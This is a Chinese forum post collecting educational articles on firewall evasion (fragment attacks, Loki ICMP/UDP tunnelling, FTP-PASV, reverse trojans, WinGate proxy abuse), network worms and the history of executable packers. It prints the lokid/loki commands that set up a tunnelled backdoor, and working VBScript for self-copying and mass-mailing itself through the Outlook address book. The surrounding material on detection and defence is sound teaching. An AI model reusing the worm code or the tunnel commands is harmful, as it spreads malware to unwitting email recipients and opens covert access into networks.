  这种攻击的原理是:在IP的分片包中,所有的分片包用一个分片偏移字段标志分片包的顺序,但是,只有第一个分片包含有TCP端口号的信息。当IP分片包通过分组过滤防火墙时,防火墙只根据第一个分片包的Tcp信息判断是否允许通过,而其他后续的分片不作防火墙检测,直接让它们通过。

  这样,攻击者就可以通过先发送第一个合法的IP分片,骗过防火墙的检测,接着封装了恶意数据的后续分片包就可以直接穿透防火墙,直接到达内部网络主机,从而威胁网络和主机的安全。

  4 木马攻击

  对于包过滤防火墙最有效的攻击就是木马了,一但你在内部网络安装了木马,防火墙基本上是无能为力的。

  原因是:包过滤防火墙一般只过滤低端口(1-1024),而高端口他不可能过滤的(因为,一些服务要用到高端口,因此防火墙不能关闭高端口的),所以很多的木马都在高端口打开等待,如冰河,subseven等。。。

  但是木马攻击的前提是必须先上传,运行木马,对于简单的包过滤防火墙来说,是容易做的。这里不写这个了。大概就是利用内部网络主机开放的服务漏洞。
  
  早期的防火墙都是这种简单的包过滤型的,到现在已很少了,不过也有。现在的包过滤采用的是状态检测技术,下面谈谈状态检测的包过滤防火墙。

  三 攻击状态检测的包过滤

  状态检测技术最早是checkpoint提出的,在国内的许多防火墙都声称实现了状态检测技术。

  可是:)很多是没有实现的。到底什么是状态检测?

  一句话,状态检测就是从tcp连接的建立到终止都跟踪检测的技术。

  原先的包过滤,是拿一个一个单独的数据包来匹配规则的。可是我们知道,同一个tcp连接,他的数据包是前后关联的,先是syn包,-》数据包=》fin包。数据包的前后序列号是相关的。
 
  如果割裂这些关系,单独的过滤数据包,很容易被精心够造的攻击数据包欺骗!!!如nmap的攻击扫描,就有利用syn包,fin包,reset包来探测防火墙后面的网络。!

  相反,一个完全的状态检测防火墙,他在发起连接就判断,如果符合规则,就在内存登记了这个连接的状态信息(地址,port,选项。。),后续的属于同一个连接的数据包,就不需要在检测了。直接通过。而一些精心够造的攻击数据包由于没有在内存登记相应的状态信息,都被丢弃了。这样这些攻击数据包,就不能饶过防火墙了。

  说状态检测必须提到动态规则技术。在状态检测里,采用动态规则技术,原先高端口的问题就可以解决了。实现原理是:平时,防火墙可以过滤内部网络的所有端口(1-65535),外部攻击者难于发现入侵的切入点,可是为了不影响正常的服务,防火墙一但检测到服务必须开放高端口时,如(ftp协议,irc等),防火墙在内存就可以动态地天加一条规则打开相关的高端口。等服务完成后,这条规则就又被防火墙删除。这样,既保障了安全,又不影响正常服务,速度也快。!

  一般来说,完全实现了状态检测技术防火墙,智能性都比较高,一些扫描攻击还能自动的反应,因此,攻击者要很小心才不会被发现。

  但是,也有不少的攻击手段对付这种防火墙的。

  1 协议隧道攻击

  协议隧道的攻击思想类似与VPN的实现原理,攻击者将一些恶意的攻击数据包隐藏在一些协议分组的头部,从而穿透防火墙系统对内部网络进行攻击。

  例如,许多简单地允许ICMP回射请求、ICMP回射应答和UDP分组通过的防火墙就容易受到ICMP和UDP协议隧道的攻击。Loki和lokid(攻击的客户端和服务端)是实施这种攻击的有效的工具。在实际攻击中,攻击者首先必须设法在内部网络的一个系统上安装上lokid服务端,而后攻击者就可以通过loki客户端将希望远程执行的攻击命令(对应IP分组)嵌入在ICMP或UDP包头部,再发送给内部网络服务端lokid,由它执行其中的命令,并以同样的方式返回结果。由

  于许多防火墙允许ICMP和UDP分组自由出入,因此攻击者的恶意数据就能附带在正常的分组,绕过防火墙的认证,顺利地到达攻击目标主机下面的命令是用于启动lokid服务器程序:

lokid-p–I–vl

loki客户程序则如下启动:

loki–d172.29.11.191(攻击目标主机)-p–I–v1–t3

  这样,lokid和loki就联合提供了一个穿透防火墙系统访问目标系统的一个后门。

  2 利用FTP-pasv绕过防火墙认证的攻击

  FTP-pasv攻击是针对防火墙实施入侵的重要手段之一。目前很多防火墙不能过滤这种攻击手段。如CheckPoint的Firewall-1,在监视FTP服务器发送给客户端的包的过程中,它在每个包中寻找"227"这个字符串。如果发现这种包,将从中提取目标地址和端口,并对目标地址加以验证,通过后,将允许建立到该地址的TCP连接。

  攻击者通过这个特性,可以设法连接受防火墙保护的服务器和服务。详细的描述可见:http://www.checkpoint.com/techsupport/alerts/pasvftp.html。

  3 反弹木马攻击

  反弹木马是对付这种防火墙的最有效的方法。攻击者在内部网络的反弹木马定时地连接外部攻击者控制的主机,由于连接是从内部发起的,防火墙(任何的防火墙)都认为是一个合法的连接,因此基本上防火墙的盲区就是这里了。防火墙不能区分木马的连接和合法的连接。

  但是这种攻击的局限是:必须首先安装这个木马!!!所有的木马的第一步都是关键!!!

  四 攻击代理

  代理是运行在应用层的防火墙,他实质是启动两个连接,一个是客户到代理,另一个是代理到目的服务器。

  实现上比较简单,和前面的一样也是根据规则过滤。由于运行在应用层速度比较慢/1

  攻击代理的方法很多。

  这里就以wingate为例,简单说说了。(太累了)

  WinGate是目前应用非常广泛的一种Windows95/NT代理防火墙软件,内部用户可以通过一台安装有WinGate的主机访问外部网络,但是它也存在着几个安全脆弱点。

  黑客经常利用这些安全漏洞获得WinGate的非授权Web、Socks和Telnet的访问,从而伪装成WinGate主机的身份对下一个攻击目标发动攻击。因此,这种攻击非常难于被跟踪和记录。
  
  导致WinGate安全漏洞的原因大多数是管理员没有根据网络的实际情况对WinGate代理防火墙软件进行合理的设置,只是简单地从缺省设置安装完毕后就让软件运行,这就给攻击者可乘之机。

  1 非授权Web访问

  某些WinGate版本(如运行在NT系统下的2.1d版本)在误配置情况下,允许外部主机完全匿名地访问因特网。因此,外部攻击者就可以利用WinGate主机来对Web服务器发动各种Web攻击( 如CGI的漏洞攻击等),同时由于Web攻击的所有报文都是从80号Tcp端口穿过的,因此,很难追踪到攻击者的来源。

  检测

  检测WinGate主机是否有这种安全漏洞的方法如下:

  1) 以一个不会被过滤掉的连接(譬如说拨号连接)连接到因特网上。

  2) 把浏览器的代理服务器地址指向待测试的WinGate主机。

  如果浏览器能访问到因特网,则WinGate主机存在着非授权Web访问漏洞。


  2 非授权Socks访问

  在WinGate的缺省配置中,Socks代理(1080号Tcp端口)同样是存在安全漏洞。与打开的Web代理(80号Tcp端口)一样,外部攻击者可以利用Socks代理访问因特网。


  防范

  要防止攻击WinGate的这个安全脆弱点,管理员可以限制特定服务的捆绑。在多宿主(multi homed)系统上,执行以下步骤以限定如何提供代理服务。

  1选择Socks或WWWProxyServer属性。

  2选择Bindings标签。

  3按下ConnectiollBeAcceptedOnTheFollowingInterfaceOnly按钮,并指定本WinGate服务器的内部接口。

  非授权Telnet访问

  它是WinGate最具威胁的安全漏洞。通过连接到一个误配置的WinGate服务器的Telnet服务,攻击者可以使用别人的主机隐藏自己的踪迹,随意地发动攻击。

  检测

  检测WinGate主机是否有这种安全漏洞的方法如下:

  1.使用telnet尝试连接到一台WinGate服务器。

[root@happy/tmp]#telnet172.29.11.191

Trying172.29.11.191….

Connectedto172.29.11.191.

Escapecharacteris‘^]’.

Wingate>10.50.21.5


  2.如果接受到如上的响应文本,那就输入待连接到的网站。


  3.如果看到了该新系统的登录提示符,那么该服务器是脆弱的。

Connectedtohost10.50.21.5…Connected

SunOS5.6

Login:

  对策

  防止这种安全脆弱点的方法和防止非授权Socks访问的方法类似。在WinGate中简单地限制特定服务的捆绑就可以解决这个问题。一般来说,在多宿主(multihomed)系统管理员可以通过执行以下步骤来完成:

  1.选择TelnetSever属性。

  2.选择Bindings标签。

  3.按下ConnectiollBeAcceptedOnTheFollowingInterfaceOnly按钮,并指定本WinGate服务器的内部接口。


  五 后话

  有防火墙的攻击不单是上面的一点,我有什么写的不对的,大家指正。

  一直以来,黑客都在研究攻击防火墙的技术和手段,攻击的手法和技术越来越智能化和多样化。但是就黑客攻击防火墙的过程上看,大概可以分为三类攻击。

  第一类攻击防火墙的方法是探测在目标网络上安装的是何种防火墙系统并且找出此防火墙系统允许哪些服务。我们叫它为对防火墙的探测攻击。

  第二类攻击防火墙的方法是采取地址欺骗、TCP序号攻击等手法绕过防火墙的认证机制,从而 对防火墙和内部网络破坏。

  第三类攻击防火墙的方法是寻找、利用防火墙系统实现和设计上的安全漏洞,从而有针对性地发动攻击。这种攻击难度比较大,可是破坏性很大。













蠕虫技术(上)

凡能够引起计算机故障,破坏计算机数据的程序统称为计算

机病毒。所以从这个意义上说,蠕虫也是一种病毒!网络蠕虫病毒,

作为对互联网危害严重的一种计算机程序,其破坏力和传染性不容忽

视.与传统的病毒不同,蠕虫病毒以计算机为载体,以网络为攻击对

象!本文中将蠕虫病毒分为针对企业网络和个人用户2类,并从企业

用户和个人用户两个方面探讨蠕虫病毒的特征和一些防范措施!
本文根据蠕虫病毒的发作机制,将其分为利用系统级别漏洞(主动传

播)和利用社会工程学(欺骗传播)两种,并从用户角度中将蠕虫病毒

分为针对企业网络和个人用户2类,从企业用户和个人用户两个方面

探讨蠕虫病毒的特征和一些防范措施!
一 蠕虫病毒定义
1蠕虫病毒的定义
2蠕虫病毒与一般病毒的异同
3蠕虫病毒的危害和趋势
二 蠕虫病毒的分析和防范
1企业用户的防止蠕虫
2个人用户防止蠕虫
三 研究蠕虫的现实意义
一 蠕虫病毒的定义
1.1蠕虫病毒的定义
计算机病毒自出现之日起,就成为计算机的一个巨大威胁,而当网络

迅速发展的时候,蠕虫病毒引起的危害开始显现!从广义上定义,凡

能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。所

以从这个意义上说,蠕虫也是一种病毒!但是蠕虫病毒和一般的病毒

有着很大的区别.对于蠕虫,现在还没有一个成套的理论体系,一般认

为,蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如

传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文

件寄生(有的只存在于内存中),对网络造成拒绝服务,以及和黑客

技术相结合等等!在产生的破坏性上,蠕虫病毒也不是普通病毒所能

比拟的,网络的发展使得蠕虫可以在短短的时间内蔓延整个网络,造

成网络瘫痪!
在本论文中,根据使用者情况将蠕虫病毒分为2类,一种是面向企业用

户和局域网而言,这种病毒利用系统漏洞,主动进行攻击,可以对整个

互联网可造成瘫痪性的后果!以“红色代码”,“尼姆达”,以及最

新的“sql蠕虫王”为代表。另外一种是针对个人用户的,通过网络(

主要是电子邮件,恶意网页形式)迅速传播的蠕虫病毒,以爱虫病毒,求

职信病毒为例.在这两类中,第一类具有很大的主动攻击性,而且爆

发也有一定的突然性,但相对来说,查杀这种病毒并不是很难。第二

种病毒的传播方式比较复杂和多样,少数利用了微软的应用程序的漏

洞,更多的是利用社会工程学()对用户进行欺骗和诱使,这样的病毒

造成的损失是非常大的,同时也是很难根除的,比如求职信病毒,在

2001年就已经被各大杀毒厂商发现,但直到2002年底依然排在病毒危

害排行榜的首位就是证明!出得在接下来的内容中,将分别分析这两

种病毒的一些特征及防范措施!





1.2蠕虫病毒与一般病毒的异同
蠕虫也是一种病毒,因此具有病毒的共同特征。一般的病毒是需要的

寄生的,它可以通过自己指令的执行,将自己的指令代码写到其他程

序的体内,而被感染的文件就被称为”宿主”,例如,windows下可执

行文件的格式为pe格式(Portable Executable),当需要感染pe文件时

,在宿主程序中,建立一个新节,将病毒代码写到新节中,修改的程

序入口点等,这样,宿主程序执行的时候,就可以先执行病毒程序,

病毒程序运行完之后,在把控制权交给宿主原来的程序指令。可见,

病毒主要是感染文件,当然也还有像DIRII这种链接型病毒,还有引

导区病毒。引导区病毒他是感染磁盘的引导区,如果是软盘被感染,

这张软盘用在其他机器上后,同样也会感染其他机器,所以传播方式

也是用软盘等方式。
蠕虫一般不采取利用pe格式插入文件的方法,而是复制自身在互联网

环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而

言,而蠕虫病毒的传染目标是互联网内的所有计算机.局域网条件下的

共享文件夹,电子邮件email,网络中的恶意网页,大量存在着漏洞的

服务器等都成为蠕虫传播的良好途径。网络的发展也使得蠕虫病毒可

以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使

得人们手足无策!
普通病毒 蠕虫病毒
存在形式 寄存文件 独立程序
传染机制 宿主程序运行 主动攻击
传染目标 本地文件 网络计算机



蠕虫技术(中)


可以预见,未来能够给网络带来重大灾难的主要必定是网络蠕虫!
1.3蠕虫的破坏和发展趋势
1988年一个由美国CORNELL大学研究生莫里斯编写的蠕虫病毒蔓延造

成了数千台计算机停机,蠕虫病毒开始现身网络;而后来的红色代码

,尼姆达病毒疯狂的时候,造成几十亿美元的损失;北京时间2003年1

月26日, 一种名为“2003蠕虫王”的电脑病毒迅速传播并袭击了全球

,致使互联网网路严重堵塞,作为互联网主要基础的域名服务器

(DNS)的瘫痪造成网民浏览互联网网页及收发电子邮件的速度大幅

减缓, 同时银行自动提款机的运作中断, 机票等网络预订系统的运作

中断, 信用卡等收付款系统出现故障!专家估计,此病毒造成的直接经

济损失至少在12亿美元以上!
病毒名称 持续时间 造成损失
莫里斯蠕虫 1988年 6000多台计算机停机,直接经济损失达9600万美

元!
美丽杀手 1999年3月 政府部门和一些大公司紧急关闭了网络服务器,

经济损失超过12亿美元!
爱虫病毒 2000年5月至今 众多用户电脑被感染,损失超过100亿美元

以上,
红色代码 2001年7月 网络瘫痪,直接经济损失超过26亿美元
求职信 2001年12月至今 大量病毒邮件堵塞服务器,损失达数百亿美


Sql蠕虫王 2003年1月 网络大面积瘫痪,银行自动提款机运做中断,直

接经济损失超过26亿美元
由表可以知道,蠕虫病毒对网络产生堵塞作用,并造成了巨大的经济损

失!
通过对以上蠕虫病毒的分析,可以知道,蠕虫发作的一些特点和发展趋

势:
1.利用操作系统和应用程序的漏洞主动进行攻击.. 此类病毒主要是

“红色代码”和“尼姆达”,以及至今依然肆虐的”求职信”等.由于

IE浏览器的漏洞(Iframe ExecCommand),使得感

染了“尼姆达”病毒的邮件在不去手工打开附件的情况下病毒就能激

活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件

,只要不去打开附件,病毒不会有危害。“红色代码”是利用了微软

IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播。Sql蠕虫王

病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击!
2传播方式多样 如“尼姆达”病毒和”求职信”病毒,可利用的传播

途径包括文件、电子邮件、Web服务器、网络共享等等.
  3.病毒制作技术新 与传统的病毒不同的是,许多新病毒是利用当

前最新的编程语言与编程技术实现的,易于修改以产生新的变种,从

而逃避反病毒软件的搜索。另外,新病毒利用Java、ActiveX、VB

script等技术,可以潜伏在HTML页面里,在上网浏览时触发。  




4.与黑客技术相结合! 潜在的威胁和损失更大!以红色代码为例,

感染后的机器的web目录的\scripts下将生成一个root.exe,可以远程

执行任何命令,从而使黑客能够再次进入!


二网络蠕虫病毒分析和防范
蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞,这里

的漏洞或者说是缺陷,我们分为2种,软件上的缺陷和人为上的缺陷

。软件上的缺陷,如远程溢出,微软ie和outlook的自动执行漏洞等

等,需要软件厂商和用户共同配合,不断的升级软件。而人为的缺陷

,主要是指的是计算机用户的疏忽。这就是所谓的社会工程学

(social engineering),当收到一封邮件带着病毒的求职信邮件时候

,大多数人都会报着好奇去点击的。对于企业用户来说,威胁主要集

中在服务器和大型应用软件的安全上,而个人用户而言,主要是防范

第二种缺陷。
2.1利用系统漏洞的恶性蠕虫病毒分析
在这种病毒中,以红色代码,尼姆达和sql蠕虫为代表!他们共同的特征

是利用微软服务器和应用程序组件的某个漏洞进行攻击,由于网上存

在这样的漏洞比较普遍,使得病毒很容易的传播!而且攻击的对象大都

为服务器,所以造成的网络堵塞现象严重!
以2003年1月26号爆发的sql蠕虫为例,爆发数小时内席卷了全球网络,

造成网络大塞车.亚洲国家中以人口上网普及率达七成的韩国所受影

响较为严重。韩国两大网络业KFT及南韩电讯公司,系统都陷入了瘫

痪,其它的网络用户也被迫断线,更为严重的是许多银行的自动取款

机都无法正常工作, 美国许美国银行统计,该行的13000台自动柜员

机已经无法提供正常提款。网络蠕虫病毒开始对人们的生活产生了巨

大的影响!
这次sql蠕虫攻击的是微软数据库系Microsoft SQL Server 2000的,

利用了MSSQL2000服务远程堆栈缓冲区溢出漏洞, Microsoft SQL

Server 2000是一款由Microsoft公司开发的商业性质大型数据库系统

。 SQL Server监听UDP的1434端口,客户端可以通过发送消息到这个

端口来查询目前可用的连接方式(连接方式可以是命名管道也可以是

TCP),但是此程序存在严重漏洞,当客户端发送超长数据包时,将

导致缓冲区溢出,黑客可以利用该漏洞在远程机器上执行自己的恶意

代码。
微软在200年7月份的时候就为这个漏洞发布了一个安全公告,但当sql

蠕虫爆发的时候,依然有大量的装有ms sqlserver 2000的服务器没有

安装最新的补丁,从而被蠕虫病毒所利用,蠕虫病毒通过一段376个字

节的恶意代码,远程获得对方主机的系统控制权限, 取得三个Win32

API地址,GetTickCount、socket、sendto,接着病毒使用

GetTickCount获得一个随机数,进入一个死循环继续传播。在该循环

中蠕虫使用获得的随机数生成一个随机的ip地址,然后将自身代码发

送至1434端口(Microsoft SQL Server开放端口),该蠕虫传播速度极

快,其使用广播数据包方式发送自身代码,每次均攻击子网中所有

255台可能存在机器。由于这是一个死循环的过程,发包密度仅和机

器性能和网络带宽有关,所以发送的数据量非常大。该蠕虫对被感染

机器本身并没有进行任何恶意破坏行为,也没有向硬盘上写文件,仅

仅存在与内存中。对于感染的系统,重新启动后就可以清除蠕虫,但

是仍然会重复感染。由于发送数据包占用了大量系统资源和网络带宽

,形成Udp Flood,感染了该蠕虫的网络性能会极度下降。一个百兆

网络内只要有一两台机器感染该蠕虫就会导致整个网络访问阻塞。
通过以上分析可以知道,此蠕虫病毒本身除了对网络产生拒绝服务攻

击外,并没有别的破坏措施.但如果病毒编写者在编写病毒的时候加入

破坏代码,后果将不堪设想!







蠕虫技术(下)


2.3企业防范蠕虫病毒措施
此次sql蠕虫病毒,利用的漏洞在2002年7月份微软的一份安全公告中

就有详细说明!而且微软也提供了安全补丁提供下载,然而在时隔半

年之后互联网上还有相当大的一部分服务器没有安装最新的补丁,其

网络管理员的安全防范意识可见一斑!
当前,企业网络主要应用于文件和打印服务共享、办公自动化系统、

企业业务(MIS)系统、Internet应用等领域。网络具有便利信息交

换特性,蠕虫病毒也可以充分利用网络快速传播达到其阻塞网络目的

。企业在充分地利用网络进行业务处理时,就不得不考虑企业的病毒

防范问题,以保证关系企业命运的业务数据完整不被破坏。
企业防治蠕虫病毒的时候需要考虑几个问题:病毒的查杀能力,病毒

的监控能力,新病毒的反应能力。而企业防毒的一个重要方面是是管

理和策略。推荐的企业防范蠕虫病毒的策略如下:
1. 加强网络管理员安全管理水平,提高安全意识。由于蠕虫病毒利

用的是系统漏洞进行攻击,所以需要在第一时间内保持系统和应用软

件的安全性,保持各种操作系统和应用软件的更新!由于各种漏洞的

出现,使得安全不在是一种一劳永逸的事,而作为企业用户而言,所

经受攻击的危险也是越来越大,要求企业的管理水平和安全意识也越

来越高!
2. 建立病毒检测系统。能够在第一时间内检测到网络异常和病毒攻

击。
3. 建立应急响应系统,将风险减少到最小!由于蠕虫病毒爆发的突

然性,可能在病毒发现的时候已经蔓延到了整个网络,所以在突发情

况下,建立一个紧急响应系统是很有必要的,在病毒爆发的第一时间

即能提供解决方案。
4. 建立灾难备份系统。对于数据库和数据系统,必须采用定期备份

,多机备份措施,防止意外灾难下的数据丢失!
5. 对于局域网而言,可以采用以下一些主要手段:(1)在因特网

接入口处安装防火墙式防杀计算机病毒产品,将病毒隔离在局域网之

外。(2)对邮件服务器进行监控,防止带毒邮件进行传播!(3)对

局域网用户进行安全培训。(4)建立局域网内部的升级系统,包括

各种操作系统的补丁升级,各种常用的应用软件升级,各种杀毒软件

病毒库的升级等等!





.3对个人用户产生直接威胁的蠕虫病毒
在以上分析的蠕虫病毒中,只对安装了特定的微软组件的系统进行攻

击,而对广大个人用户而言,是不会安装iis(微软的因特网服务器程

序,可以使允许在网上提供web服务)或者是庞大的数据库系统的!因

此上述病毒并不会直接攻击个个人用户的电脑(当然能够间接的通过

网络产生影响),但接下来分析的蠕虫病毒,则是对个人用户威胁最

大,同时也是最难以根除,造成的损失也更大的一类蠕虫病毒!
对于个人用户而言,威胁大的蠕虫病毒采取的传播方式一般为电子邮

件(Email)以及恶意网页等等!
对于利用email传播得蠕虫病毒来说,通常利用的是社会工程学

(Social Engineering),即以各种各样的欺骗手段那诱惑用户点击的

方式进行传播!
恶意网页确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用

户在不知情的情况下打开含有病毒的网页时,病毒就会发作。这种病

毒代码镶嵌技术的原理并不复杂,所以会被很多怀不良企图者利用,

在很多黑客网站竟然出现了关于用网页进行破坏的技术的论坛,并提

供破坏程序代码下载,从而造成了恶意网页的大面积泛滥,也使越来

越多的用户遭受损失。
对于恶意网页,常常采取vb script和java script编程的形式!由于

编程方式十分的简单!所以在网上非常的流行!
Vb script和java script是由微软操作系统的wsh(Windows

scripting HostWindows脚本主机)解析并执行的,由于其编程非常

简单,所以此类脚本病毒在网上疯狂传播,疯狂一时的爱虫病毒就是

一种vbs脚本病毒,然后伪装成邮件附件诱惑用户点击运行,更为可

怕的是,这样的病毒是以源代码的形式出现的,只要懂得一点关于脚

本编程的人就可以修改其代码,形成各种各样的变种。
下面以一个简单的脚本为例:
Set objFs=CreateObject (“scripting.FileSystemObject”)(创

建一个文件系统对象)  objFs.CreateTextFile

("C:\virus.txt", 1)(通过文件系统对象的方法创建了TXT文件) 

 如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘

中创建一个TXT文件了。倘若我们把第二句改为:
objFs.GetFile (Wscript.scriptFullName).Copy

("C:\virus.vbs")
就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚

本文件,Wscript.scriptFullName指明是这个程序本身,是一个完整

的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复

制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我

复制的功能,已经具备病毒的基本特征——自我复制能力。
此类病毒往往是通过邮件传播的,在vb script中调用邮件发送功能

也非常的简单,病毒往往采用的方法是向outlook中的地址薄中的邮

件地址发送带有包含自身的邮件来达到传播目的,一个简单的实例如

下:
Set objOA=Wscript.CreateObject ("Outlook.Application")(创

建一个OUTLOOK应用的对象)
Set objMapi=objOA.GetNameSpace ("MAPI")(取得MAPI名字空间


For i=1 to objMapi.AddressLists.Count(遍历地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)
objMail.Recipients.Add (objAddList. AddressEntries (j))

(取得收件人邮件地址 )  objMail.Subject="你好!" (设置邮

件主题,这个往往具有很大的诱惑性质)
objMail.Body="这次给你的附件,是我的新文档!" (设置信件内容


objMail.Attachments.Add (“c:\virus.vbs")(把自己作为附件

扩散出去 )
objMail.Send  (发送邮件)
Next
Next
Set objMapi=Nothing  (清空objMapi变量,释放资源)
set objOA=Nothing  (清空objOA变量)
  这一小段代码的功能是向地址簿中的用户发送电子邮件,并将自

己作为附件扩散出去。这段代码中的第一行是创建一个Outlook的对

象,是必不可少的。在其下是一个循环,在循环中不断地向地址簿中

的电子邮件地址发送内容相同的信件。这就是蠕虫的传播性。
由此可以看出,利用vb script编写病毒是非常容易的,这就使得此

类病毒的变种繁多,破坏力极大,同时也是非常难以根除的!
2.4个人用户对蠕虫病毒的防范措施
通过上述的分析,我们可以知道,病毒并不是非常可怕的,网络蠕虫

病毒对个人用户的攻击主要还是通过社会工程学,而不是利用系统漏

洞!所以防范此类病毒需要注意以下几点:




1.购合适的杀毒软件!网络蠕虫病毒的发展已经使传统的杀毒软件

的“文件级实时监控系统”落伍,杀毒软件必须向内存实时监控和邮

件实时监控发展!另外面对防不胜防的网页病毒,也使得用户对杀毒

软件的要求越来越高!在杀毒软件市场上,赛门铁克公司的norton系

列杀毒软件在全球具有很大的比例!经过多项测试,norton杀毒系列

软件脚本和蠕虫阻拦技术能够阻挡大部分电子邮件病毒,而且对网页

病毒也有相当强的防范能力!目前国内的杀毒软件也具有了相当高的

水平.像瑞星,kv系列等杀毒软件,在杀毒软件的同时整合了防火强功

能,从而对蠕虫兼木马程序有很大克制作用.
2 。经常升级病毒库,杀毒软件对病毒的查杀是以病毒的特征码为依

据的,而病毒每天都层出不穷,尤其是在网络时代,蠕虫病毒的传播速

度快,变种多,所以必须随时更新病毒库,以便能够查杀最新的病毒!
3.提高防杀毒意识.不要轻易去点击陌生的站点,有可能里面就含有

恶意代码!
当运行IE时,点击“工具→Internet选项→安全→ Internet区域的

安全级别”,把安全级别由“中”改为“高” 。、因为这一类网页

主要是含有恶意代码的ActiveX或Applet、 javascript的网页文件

,所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可

以大大减少被网页恶意代码感染的几率。具体方案是:在IE窗口中点

击“工具”→“Internet选项”,在弹出的对话框中选择“安全”标

签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把

其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”

。但是,这样做在以后的网页浏览过程中有可能会使一些正常应用

ActiveX的网站无法浏览。
4.不随意查看陌生邮件,尤其是带有附件的邮件,,由于有的病毒

邮件能够利用ie和outlook的漏洞自动执行,所以计算机用户需要升

级ie和outlook程序,及常用的其他应用程序!


三小结
网络蠕虫病毒作为一种互联网高速发展下的一种新型病毒,必将对网

络产生巨大的危险。在防御上,已经不再是由单独的杀毒厂商所能够

解决,而需要网络安全公司,系统厂商,防病毒厂商及用户共同参与

,构筑全方位的防范体系!
蠕虫和黑客技术的结合,使得对蠕虫的分析,检测和防范具有一定的

难度,同时对蠕虫的网络传播性,网络流量特性建立数学模型也是有

待研究的工作


B23层 发表时间: 10-07-16 18:40

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
壳(上)


  首先我想大家应该先明白“壳”的概念。在自然界中,我想大家对壳这东西应该都不会陌生了,植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的壳)。由于这段程序和自然界的壳在功能上有很多相同的地方,基于命名的规则,大家就把这样的程序称为“壳”了。就像计算机病毒和自然界的病毒一样,其实都是命名上的方法罢了。

   最早提出“壳”这个概念的,据我所知,应该是当年推出脱壳软件 RCOPY 3 的作者熊焰先生。在几年前的 DOS 时代,“壳”一般都是指磁盘加密软件的段加密程序,可能是那时侯的加密软件还刚起步不久吧,所以大多数的加密软件(加壳软件)所生成的“成品”在“壳”和需要加密的程序之间总有一条比较明显的“分界线”。有经验的人可以在跟踪软件的运行以后找出这条分界线来,至于这样有什么用这个问题,就不用我多说了。但毕竟在当时,甚至现在这样的人也不是很多,所以当 RCOPY3 这个可以很容易就找出“分界线”,并可以方便的去掉“壳”的软件推出以后,立即就受到了很多人的注意。老实说,这个我当年在《电脑》杂志看到广告,在广州电脑城看到标着999元的软件,在当时来说,的确是有很多全新的构思,单内存生成 EXE 可执行文件这项,就应该是世界首创了。但它的思路在程序的表现上我认为还有很多可以改进的地方(虽然后来出现了可以加强其功力的 RO97),这个想法也在后来和作者的面谈中得到了证实。在这以后,同类型的软件想雨后春笋一般冒出来,记得住名字的就有: UNKEY、MSCOPY、UNALL .... 等等,但很多的软件都把磁盘解密当成了主攻方向,忽略了其它方面,当然这也为以后的“密界克星”“解密机器”等软件打下了基础,这另外的分支就不多祥谈了,相信机龄大一点的朋友都应该看过当时的广告了。

   解密(脱壳)技术的进步促进、推动了当时的加密(加壳)技术的发展。LOCK95和 BITLOK 等所谓的“壳中带籽”加密程序纷纷出笼,真是各出奇谋,把小小的软盘也折腾的够辛苦的了。正在国内的加壳软件和脱壳软件较量得正火红的时候,国外的“壳”类软件早已经发展到像 LZEXE 之类的压缩壳了。这类软件说穿了其实就是一个标准的加壳软件,它把 EXE 文件压缩了以后,再在文件上加上一层在软件被执行的时候自动把文件解压缩的“壳”来达到压缩 EXE 文件的目的。接着,这类软件也越来越多, PKEXE、AINEXE、UCEXE 和后来被很多人认识的 WWPACK 都属于这类软件,但奇怪的是,当时我看不到一个国产的同类软件。

   过了一段时间,可能是国外淘汰了磁盘加密转向使用软件序列号的加密方法吧,保护 EXE 文件不被动态跟踪和静态反编译就显得非常重要了。所以专门实现这样功能的加壳程序便诞生了。 MESS 、CRACKSTOP、HACKSTOP、TRAP、UPS 等等都是比较有名气的本类软件代表,当然,还有到现在还是数一数二的,由中国台湾同胞所写的 FSE 。其实以我的观点来看,这样的软件才能算是正宗的加壳软件。

  在以上这些加壳软件的不断升级较劲中,很多软件都把比较“极端”技术用了上去,因为在这个时候 DOS 已经可以说是给众高手们玩弄在股掌之间了,什么保护模式、反 SICE 、逆指令等等。相对来说,在那段时间里发表的很多国外脱壳程序,根本就不能对付这么多的加壳大军,什么 UPC、TEU 等等都纷纷成为必防的对象,成绩比较理想的就只有 CUP386 了,反观国内,这段时间里也没了这方面的“矛盾斗争”。加壳软件门挥军直捣各处要岗重地,直到在我国遇到了 TR 这个铜墙铁壁以后,才纷纷败下阵来各谋对策,但这已经是一年多以后的事情了。我常想,如果 TR 能早两年“出生”的话,成就肯定比现在大得多,甚至盖过 SICE 也有可能。TR 发表的时候 WIN95 的流行已经成为事实,DOS 还有多少的空间,大家心里都清楚。但话又说回来, TR 的确是个好软件,比起当年的 RCOPY3 有过之而无不及,同时也证明了我们中国的 CRACK 实力(虽然有点过时)。这个时候,前面提到过的 FSE 凭着强劲的实力也渐渐的浮出了水面,独领风骚。其时已经是 1997 年年底了,我也走完了学生“旅程”。工作后在CFIDO 的 CRACK 区认识了 Ding-Boy ,不久 CRACK 区关了,我从此迷上了 INTERNET,并于98年6月建起了一个专门介绍“壳”的站台: http://topage.126.com 